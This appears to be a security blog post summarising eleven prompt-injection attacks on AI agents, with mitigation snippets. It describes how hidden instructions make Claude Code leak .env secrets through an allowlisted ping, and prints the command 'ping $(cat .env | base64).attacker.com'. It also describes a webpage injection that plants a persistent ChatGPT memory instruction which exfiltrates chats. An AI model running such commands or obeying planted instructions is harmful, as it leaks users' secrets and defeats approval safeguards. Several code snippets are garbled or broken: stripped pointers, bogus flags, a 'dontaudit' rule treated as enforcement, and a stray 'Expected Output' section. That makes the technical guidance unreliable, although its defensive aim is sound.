Listen to this Post

Introduction:
Google researchers have validated what red teams have long suspected: AI models cannot be trusted to secure themselves. In a sweeping analysis of eleven real-world attacks against agentic systems — including ChatGPT, Microsoft Copilot, Claude Code, Cursor, Devin AI, Amp AI, and DeepSeek AI — the team demonstrated that prompt injection, memory tampering, and DNS exfiltration succeed not because of model failures alone, but because the entire system architecture lacks basic security invariants. Treating the LLM as an untrusted component and enforcing security at the system level is the only path forward.
Learning Objectives:
– Identify how attacker-controlled data crosses into instruction layers through prompt injection, memory writes, and allowlist bypasses
– Implement least-privilege sandboxing, verifiable policy generation, and information flow controls for production AI agents
– Mitigate DNS exfiltration, persistent memory attacks, and tool‑call boundary vulnerabilities using deterministic reference monitors
You Should Know:
1. DNS Exfiltration via Allow‑Listed Commands (CVE‑2025‑55284)
Claude Code’s developers gated dangerous shell commands behind human approval but allowlisted `ping`. Attackers hid a prompt in a code file instructing the agent to read `.env` secrets and pass them as arguments to `ping`. The ping command performed a DNS lookup to an attacker‑controlled domain (e.g., `ping $(cat .env | base64).attacker.com`), exfiltrating secrets as subdomain labels.
Step‑by‑step guide to detect and block this vector:
Linux – Monitor live DNS queries:
sudo tcpdump -i eth0 -1 port 53 | grep -E "A\?.\.attacker" Or use dnstap sudo systemctl enable dnstap --1ow journalctl -u dnstap -f | grep -v trusted
Windows – Enable DNS audit logging:
Set DNS server audit policy
auditpol /set /subcategory:"DNS Server" /success:enable /failure:enable
Query DNS events
Get-WinEvent -LogName "Microsoft-Windows-DNSServer/Audit" | Where-Object {$_.Message -match "exfil"}
Mitigation – Enforce network eBPF policies:
// XDP program to block DNS queries with long subdomains (>63 chars)
SEC("xdp")
int block_long_dns(struct xdp_md ctx) {
void data_end = (void )(long)ctx->data_end;
struct ethhdr eth = (struct ethhdr )ctx->data;
if ((void )(eth + 1) > data_end) return XDP_PASS;
// Parse UDP, check DNS query length, drop if suspicious
if (dns_qname_len > 64) return XDP_DROP;
return XDP_PASS;
}
Tool‑call boundary fix (Python pseudo‑code for an agent gate):
def execute_command(cmd: str, args: list, allowed_cmds: set):
Enforce per‑invocation policy, not static allowlist
if cmd not in allowed_cmds:
raise PermissionError(f"{cmd} not allowed")
Additional: validate arguments – reject if args contain env var patterns or base64
if any(re.search(r'\$\{?[A-Z_]+\}?', arg) for arg in args):
raise SecurityViolation("Environment variable reference in argument")
Approve only after dynamic check
return subprocess.run([bash] + args, capture_output=True)
2. Persistent Memory Injection (ChatGPT macOS “SpAIware”)
A prompt injection on a malicious webpage wrote a permanent instruction into ChatGPT’s Memories feature. Thereafter, every conversation included an invisible image whose URL carried the user’s chat data as query parameters, exfiltrating everything to the attacker. This violated TCB tamper resistance (untrusted data corrupted trusted storage) and information flow control.
Step‑by‑step to harden persistent memory stores:
Implement read‑only memory boundaries with Linux LSM (AppArmor):
Create a profile for the agent’s memory store sudo aa-genprof chatgpt_memory_daemon Add rule to prevent writing from network‑facing processes sudo aa-complain /etc/apparmor.d/chatgpt_memory_daemon Deny write access from untrusted input handlers echo "deny /var/lib/agent/memories/ w," >> profile
Audit existing memory writes (Windows using Sysmon):
Install Sysmon with config to monitor registry/file writes from AI processes
sysmon64 -accepteula -i sysmon-config.xml
Watch for writes to agent persistent storage
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; ID=11} | Where-Object {$_.Message -match "memories"}
Information flow label (concept using eBPF + LSM):
// Tag data from untrusted sources (webpage content) as "untrusted"
// Block writing untrusted → trusted storage
int security_hook_file_permission(struct file file, int mask) {
if (is_untrusted_source(current) && (mask & MAY_WRITE) && is_memory_store(file))
return -EPERM;
return 0;
}
3. Information Flow Control for Agentic Systems
Once an agent reads sensitive data (e.g., PII, API keys), sandboxing alone cannot prevent it from being leaked through covert channels. Information flow control (IFC) attaches labels to data and enforces that labeled data never reaches untrusted outputs unless sanitized.
Step‑by‑step using Open Policy Agent (OPA) as a deterministic IFC gate:
Define a data label schema (Rego policy):
package agent.ifc
default allow = false
Sensitive label propagates to any derived output
sensitive_flow(input) {
input.data.labels[bash] == "PII"
input.output.destination == "external_network"
not input.sanitization_applied
}
Allow only if the output is internal or sanitized
allow {
not sensitive_flow(input)
}
Hook into agent tool‑call loop:
def ifc_gate(tool_name, arguments, context):
payload = {"data": context.get("sensitive_cache"), "output": tool_name}
decision = opa.query("data.agent.ifc.allow", input=payload)
if not decision:
raise IFCViolation(f"Data leak prevented: {tool_name}")
return execute_tool(tool_name, arguments)
Linux – Use SELinux to enforce process‑level IFC:
Label agent processes and sensitive files semanage fcontext -a -t agent_sensitive_t /var/secrets/ restorecon -R /var/secrets/ Create policy that prevents agent from writing labeled data to network socket echo "dontaudit agent_t socket_sendto: tcp_socket;" >> agent.te
4. Verifiable Policy Generation with Formal Verification
Natural language security policies (e.g., “never share my location”) cannot be enforced directly because LLMs are probabilistic. The solution: map NL policies to a formal language (e.g., TLA+, Rego, or eBPF) and verify the mapping before deployment.
Step‑by‑step with TLA+ and a policy compiler:
Write a simple invariant in TLA+:
VARIABLES allowed_actions, current_privilege
SafetyInvariant == \forall a \in allowed_actions:
(a.resource = "file" /\ a.path contains "/home") => a.owner = current_user
Init == allowed_actions = {} /\ current_privilege = "minimal"
Next == \/ \E action \in Actions:
IF action.requires <= current_privilege
THEN allowed_actions' = allowed_actions \cup {action}
ELSE UNCHANGED allowed_actions
Generate policy from agent spec (concept):
Use an LLM to translate user request into policy skeleton, then formally verify
nl_policy = "only read files in the current working directory"
formal_policy = translate_with_llm(nl_policy) produces TLA+ or OPA
if tlc_model_check(formal_policy) == "valid":
load_into_enforcement_gate(formal_policy)
else:
reject_and_alert("Policy unsafe")
Open source tools:
– TLA+ Toolbox (model checker)
– OPA Gatekeeper for Kubernetes agent sidecars
– AWS Cedar for fine‑grained authorization (supports automated verification)
5. Complete Mediation at the Tool‑Call Boundary
Every single tool invocation must cross a deterministic reference monitor. No request can bypass this check – including agent self‑reflection or calls to a “safety LLM” (which shares the same failure modes).
Step‑by‑step implement a sidecar proxy for agent tools:
Architecture: Agent → Sidecar (Reference Monitor) → Actual Tool (sandboxed)
Sidecar implementation (Go):
func (m ReferenceMonitor) Intercept(req ToolRequest) (ToolResponse, error) {
// 1. Enforce path: all requests must go through this func
if err := m.validatePolicy(req); err != nil {
return nil, fmt.Errorf("policy violation: %w", err)
}
// 2. Check information flow labels
if err := m.ifcTracker.Allow(req); err != nil {
return nil, err
}
// 3. Apply least privilege: strip unnecessary args
sanitized := m.minimizePrivilege(req)
// 4. Log for audit replay
m.auditLog.Log(sanitized)
// 5. Execute in sandbox
return m.sandboxExec(sanitized)
}
Deploy as Kubernetes sidecar:
apiVersion: v1 kind: Pod metadata: name: agent-with-monitor spec: containers: - name: agent image: my-agent:latest - name: reference-monitor image: refmon:latest args: ["--policy", "/etc/policy.rego", "--enforce", "all"] volumeMounts: - name: policy mountPath: /etc/policy
6. Mitigating the Human Weak Link
Humans routinely approve malicious actions due to fatigue, lack of context, or adversarial UI tricks (e.g., “ClickFix” attacks). The principle: never ask a human to make a security decision unless the consequences are fully explained and reversible.
Step‑by‑step to redesign permission prompts:
Design reversible actions with classification (OWASP AISVS C9.2.6):
Each tool action declares a reversibility class
class ActionReversibility(Enum):
READ_ONLY = 1 No approval needed
REVERSIBLE = 2 Single approval, can be undone
EXTERNAL_REV = 3 Approval + audit, external state may persist
IRREVERSIBLE = 4 Requires two-person rule + 24h timeout
def request_human_approval(action):
if action.reversibility == IRREVERSIBLE:
send_slack_to_second_admin()
wait(86400) 24h cool‑down
elif action.reversibility == EXTERNAL_REV:
show_full_diff_and_impact()
Require explicit typed confirmation, not a checkbox
user_input = input("Type 'APPROVE' to continue: ")
if user_input != "APPROVE": raise Rejection()
Audit replay for all decisions:
Store every tool call in immutable audit log echo "$(date -Iseconds) | action=$ACTION | policy=$POLICY | approver=$USER" | tee -a /var/log/agent-audit.log | sign_file
What Undercode Say:
– Key Takeaway 1: A probabilistic “safety LLM” checking another LLM is not a trusted computing base (TCB). The guard shares the agent’s failure modes; its errors are correlated, not independent. Formal verification becomes impossible when the enforcer itself is a black box.
– Key Takeaway 2: Provable instruction/data separation in the token stream may be unsolvable, but that does not matter. If every action crosses a deterministic reference monitor before execution – enforcing a formal policy on the tool call, not on the model’s “intent” – then whether the model was fooled becomes irrelevant. Separation lightens the load on the boundary; complete mediation carries the weight.
Analysis (∼10 lines): The eleven attacks all share a structural cause: untrusted input crossed into the instruction layer somewhere in the chain. Google’s paper correctly shifts the debate from “make models robust” to “build systems that assume the model is compromised.” The practical implication for enterprises is immediate – treat every agent tool invocation as a minimum‑privilege authorization decision, not a capability gate expressed as a static list. Allowlists like Claude’s ping are architectural failures, not implementation bugs. OWASP’s newly merged AISVS controls (C9.2.6 – reversibility classification, C9.2.7 – worst‑case‑governs) provide a deterministic action‑class boundary that addresses most of the eleven cases today. The hardest research problem – provable instruction/data separation – may never be fully solved, but verifiable policy generation plus information flow control plus a deterministic gate is the shippable path.
Expected Output:
Introduction: (as above)
What Undercode Say: (as above)
Prediction:
-1 Enterprises rushing agentic AI to production without deterministic reference monitors will experience data exfiltration incidents at 3x the rate of those using formal policy gates by Q4 2026.
-1 Regulatory bodies will require “AI system invariants” as part of compliance, forcing a hard split between probabilistic model outputs and deterministic enforcement layers.
+1 Open source reference monitors (eBPF, OPA, Cedar) will become as standard for AI agents as firewalls are for networks, creating a new security product category.
-P From these failures, a new design pattern will emerge: the “agent TCB” – a formally verified, hardware‑isolated component that mediates all tool calls, finally enabling safe autonomous operations in finance and healthcare.
▶️ Related Video (66% Match):
🎯Let’s Practice For Free:
🎓 Live Courses & Certifications:
[Join Undercode Academy for Verified Certifications](https://undercode.co.uk/certifications/)
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[[email protected]](mailto:[email protected])
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
IT/Security Reporter URL:
Reported By: [Ilyakabanov Agent](https://www.linkedin.com/posts/ilyakabanov_agent-security-is-a-systems-problem-ugcPost-7465406309547536384-t7uA/) – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]
[💬 Whatsapp](https://undercode.help/whatsapp) | [💬 Telegram](https://t.me/UndercodeCommunity)
📢 Follow UndercodeTesting & Stay Tuned:
[𝕏 formerly Twitter 🐦](https://x.com/undercodeupdate) | [@ Threads](https://www.threads.net/@undercodetesting) | [🔗 Linkedin](https://www.linkedin.com/company/undercodetesting/) | [🦋BlueSky](https://bsky.app/profile/undercode.bsky.social)


